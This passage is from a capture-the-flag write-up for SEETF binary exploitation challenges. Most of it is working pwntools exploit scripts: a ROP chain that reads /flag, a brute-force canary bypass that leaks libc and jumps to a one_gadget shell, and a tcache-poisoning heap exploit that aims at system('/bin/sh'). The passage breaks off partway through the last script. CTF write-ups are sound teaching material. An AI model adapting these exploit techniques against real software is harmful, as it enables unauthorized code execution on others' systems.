</span></span><span class=line><span class=cl><span class=n>pop_rcx</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x8c6bb</span>
</span></span><span class=line><span class=cl><span class=n>pop_rsi</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x2be51</span>
</span></span><span class=line><span class=cl><span class=n>pop_rdi</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x2a3e5</span>
</span></span><span class=line><span class=cl><span class=n>pop_rdx</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x90529</span>  <span class=c1># pop rdx ; pop rbx ; ret</span>
</span></span><span class=line><span class=cl><span class=n>pop_r8</span>  <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x165b76</span> <span class=c1># pop r8 ; mov eax, 1 ; ret</span>
</span></span><span class=line><span class=cl><span class=n>syscall</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0xec3a9</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;
</span></span></span><span class=line><span class=cl><span class=s2>   0x11ea36 &lt;syscall+22&gt;:       mov    r9,QWORD PTR [rsp+0x8]
</span></span></span><span class=line><span class=cl><span class=s2>   0x11ea3b &lt;syscall+27&gt;:       syscall
</span></span></span><span class=line><span class=cl><span class=s2>   0x11ea3d &lt;syscall+29&gt;:       cmp    rax,0xfffffffffffff001
</span></span></span><span class=line><span class=cl><span class=s2>   0x11ea43 &lt;syscall+35&gt;:       jae    0x11ea46 &lt;syscall+38&gt;
</span></span></span><span class=line><span class=cl><span class=s2>   0x11ea45 &lt;syscall+37&gt;:       ret
</span></span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;</span>
</span></span><span class=line><span class=cl><span class=n>set_r9</span>  <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x11ea36</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>=</span> <span class=n>fit</span><span class=p>({</span>
</span></span><span class=line><span class=cl>    <span class=mi>24</span><span class=p>:</span> <span class=n>canary</span><span class=p>,</span>
</span></span><span class=line><span class=cl>    <span class=mi>40</span><span class=p>:</span> <span class=c1># open(&#34;/flag&#34;, 0, 0)</span>
</span></span><span class=line><span class=cl>        <span class=p>[</span><span class=n>pop_rax</span><span class=p>,</span> <span class=mi>2</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rdi</span><span class=p>,</span> <span class=n>flag_addr</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rsi</span><span class=p>,</span> <span class=mi>0</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rdx</span><span class=p>,</span> <span class=mi>0</span><span class=p>,</span> <span class=mi>0</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>syscall</span><span class=p>]</span> <span class=o>+</span>
</span></span><span class=line><span class=cl>        <span class=c1># mmap(0x1337000, 0x1000, 3, 0x22, 3, 0)</span>
</span></span><span class=line><span class=cl>        <span class=p>[</span><span class=n>pop_r8</span><span class=p>,</span> <span class=mi>3</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rax</span><span class=p>,</span> <span class=mi>2</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rdi</span><span class=p>,</span> <span class=mh>0x1337000</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rsi</span><span class=p>,</span> <span class=mh>0x1000</span><span class=p>]</span> <span class=o>+</span>
</span></span><span class=line><span class=cl>        <span class=p>[</span><span class=n>pop_rdx</span><span class=p>,</span> <span class=mi>3</span><span class=p>,</span> <span class=mi>0</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>set_r9</span><span class=p>,</span> <span class=n>pop_rcx</span><span class=p>,</span> <span class=mi>0</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rcx</span><span class=p>,</span> <span class=mh>0x2</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>mmap</span><span class=p>]</span> <span class=o>+</span>
</span></span><span class=line><span class=cl>        <span class=c1># write(1, 0x1337000, 0x100)</span>
</span></span><span class=line><span class=cl>        <span class=p>[</span><span class=n>pop_rax</span><span class=p>,</span> <span class=mi>1</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rdi</span><span class=p>,</span> <span class=mi>1</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rsi</span><span class=p>,</span> <span class=mh>0x1337000</span><span class=p>]</span> <span class=o>+</span> <span class=p>[</span><span class=n>pop_rdx</span><span class=p>,</span> <span class=mh>0x100</span><span class=p>,</span> <span class=mi>0</span><span class=p>]</span>
</span></span><span class=line><span class=cl>        <span class=o>+</span> <span class=p>[</span><span class=n>syscall</span><span class=p>]</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=p>})</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>pause</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;&gt; &#34;</span><span class=p>,</span> <span class=n>payload</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;&gt; &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;4&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div><p>Interestingly, the author provided ROP gadgets in the binary that was easy to use. Unfortunately, I overlooked it and had to get creative with the glibc gadgets.</p><h2 id=great-expectations>Great Expectations</h2><p>Very straightforward challenge that allows us to stack pivot using float values that we provide, and places a one byte canary as &lsquo;security&rsquo;.</p><p>I used a brute force approach, which should work in ~50 tries.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>struct</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>terminal</span> <span class=o>=</span> <span class=p>[</span><span class=s2>&#34;tmux&#34;</span><span class=p>,</span> <span class=s2>&#34;neww&#34;</span><span class=p>]</span>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>elf</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./chall&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>libc</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./lib/libc.so.6&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>i</span> <span class=o>=</span> <span class=mi>0</span>
</span></span><span class=line><span class=cl><span class=k>with</span> <span class=n>log</span><span class=o>.</span><span class=n>progress</span><span class=p>(</span><span class=s2>&#34;enumerating&#34;</span><span class=p>)</span> <span class=k>as</span> <span class=n>pro</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>while</span> <span class=kc>True</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>i</span> <span class=o>+=</span> <span class=mi>1</span>
</span></span><span class=line><span class=cl>        <span class=n>pro</span><span class=o>.</span><span class=n>status</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;</span><span class=si>{</span><span class=n>i</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=k>with</span> <span class=n>context</span><span class=o>.</span><span class=n>quiet</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;win.the.seetf.sg&#34;</span><span class=p>,</span> <span class=mi>2004</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=c1># p = process(&#34;./chall&#34;)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=n>r1</span> <span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mi>16</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=mh>0x401313</span><span class=p>)</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>elf</span><span class=o>.</span><span class=n>got</span><span class=o>.</span><span class=n>puts</span><span class=p>)</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>elf</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>puts</span><span class=p>)</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=mh>0x401233</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>sendafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;tale.</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=n>r1</span> <span class=o>*</span> <span class=p>(</span><span class=mh>0x107</span> <span class=o>//</span> <span class=nb>len</span><span class=p>(</span><span class=n>r1</span><span class=p>)))</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xDDDDDDDD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xDDDDDDDD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xCCE841DD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>leak</span> <span class=o>=</span> <span class=n>unpack</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;I live my life taking chances&#34;</span><span class=p>,</span> <span class=n>drop</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span><span class=o>.</span><span class=n>strip</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>),</span> <span class=s2>&#34;all&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;leak at </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>leak</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>=</span> <span class=n>leak</span> <span class=o>-</span> <span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>puts</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;libc base @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>address</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>one_gadget</span> <span class=o>=</span> <span class=mh>0xe3b01</span><span class=o>+</span><span class=n>libc</span><span class=o>.</span><span class=n>address</span>
</span></span><span class=line><span class=cl>            <span class=n>r2</span> <span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mi>16</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>one_gadget</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;tale.</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=n>r2</span> <span class=o>*</span> <span class=p>(</span><span class=mh>0x107</span> <span class=o>//</span> <span class=nb>len</span><span class=p>(</span><span class=n>r2</span><span class=p>)))</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xDDDDDDDD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xDDDDDDDD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;number!&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>struct</span><span class=o>.</span><span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;&lt;f&#34;</span><span class=p>,</span> <span class=n>p32</span><span class=p>(</span><span class=mh>0xCC0841DD</span><span class=p>))[</span><span class=mi>0</span><span class=p>])</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span><span class=line><span class=cl>        <span class=k>except</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=k>with</span> <span class=n>context</span><span class=o>.</span><span class=n>quiet</span><span class=p>:</span>
</span></span><span class=line><span class=cl>                <span class=n>p</span><span class=o>.</span><span class=n>close</span><span class=p>()</span>
</span></span><span class=line><span class=cl>            <span class=k>continue</span>
</span></span></code></pre></div><h2 id=babysheep>BabySheep</h2><p>We have a CRUD heap challenge, and the vulnerability is uninitialized stack.</p><p>By failing scanf intentitentionally, we can achieve UAF to read and write crucial metadata.</p><p>I did a tcache unlinking attach to overwrite exit funcs with system("/bin/sh").</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>create</span><span class=p>(</span><span class=n>size</span><span class=p>,</span> <span class=n>content</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;[E]xit</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;size?</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>size</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;content?</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=n>content</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>output</span><span class=p>(</span><span class=n>idx</span><span class=p>,</span> <span class=n>check</span><span class=o>=</span><span class=kc>True</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;[E]xit</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;O&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Which text? (0-9)</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>idx</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>check</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;=======&#34;</span><span class=p>,</span> <span class=n>drop</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;1. [C]reate&#34;</span><span class=p>,</span> <span class=n>drop</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>update</span><span class=p>(</span><span class=n>idx</span><span class=p>,</span> <span class=n>content</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;[E]xit</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;U&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Which text? (0-9)</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>idx</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>content</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>delete</span><span class=p>(</span><span class=n>idx</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;[E]xit</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;D&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Which text? (0-9)</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>idx</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>terminal</span> <span class=o>=</span> <span class=p>[</span><span class=s2>&#34;tmux&#34;</span><span class=p>,</span> <span class=s2>&#34;neww&#34;</span><span class=p>]</span>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>libc</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;win.the.seetf.sg&#34;</span><span class=p>,</span> <span class=mi>2001</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># p = process(&#34;./chall&#34;)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x20</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>heap_leak</span> <span class=o>=</span> <span class=p>(</span><span class=n>u64</span><span class=p>(</span><span class=n>output</span><span class=p>(</span><span class=mi>1000</span><span class=p>)[:</span><span class=mi>8</span><span class=p>])</span> <span class=o>&lt;&lt;</span> <span class=mi>12</span><span class=p>)</span> <span class=o>+</span> <span class=mh>0x350</span>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;heap leak @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>heap_leak</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x500</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;B&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x500</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>libc_leak</span> <span class=o>=</span> <span class=n>u64</span><span class=p>(</span><span class=n>output</span><span class=p>(</span><span class=mi>1000</span><span class=p>,</span> <span class=kc>False</span><span class=p>)[:</span><span class=mi>8</span><span class=p>])</span>
</span></span><span class=line><span class=cl><span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>=</span> <span class=n>libc_leak</span> <span class=o>-</span> <span class=mi>2202848</span>
</span></span><span class=line><span class=cl><span class=n>xor_key</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>-</span> <span class=mi>10384</span> <span class=o>-</span> <span class=mh>0x30</span>
</span></span><span class=line><span class=cl><span class=n>exit_funcs</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mi>2207488</span> <span class=o>+</span><span class=mh>0x150</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;libc leak @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>libc_leak</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;libc base @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>address</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;B&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>2</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1>#p64(e.got.free ^ ((heap_leak+0x2a0) &gt;&gt; 12)))</span>
</span></span><span class=line><span class=cl><span class=n>update</span><span class=p>(</span><span class=mi>123</span><span class=p>,</span> <span class=n>p64</span><span class=p>(</span><span class=n>xor_key</span> <span class=o>^</span> <span class=p>(</span><span class=n>heap_leak</span> <span class=o>&gt;&gt;</span> <span class=mi>12</span><span class=p>)))</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;D&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x50</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>xor_key</span> <span class=o>=</span> <span class=n>output</span><span class=p>(</span><span class=mi>2</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;message:</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>xor_key</span> <span class=o>=</span> <span class=n>u64</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()[</span><span class=mi>31</span><span class=p>:</span><span class=mi>39</span><span class=p>])</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;B&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>3</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>1</span><span class=p>)</span>
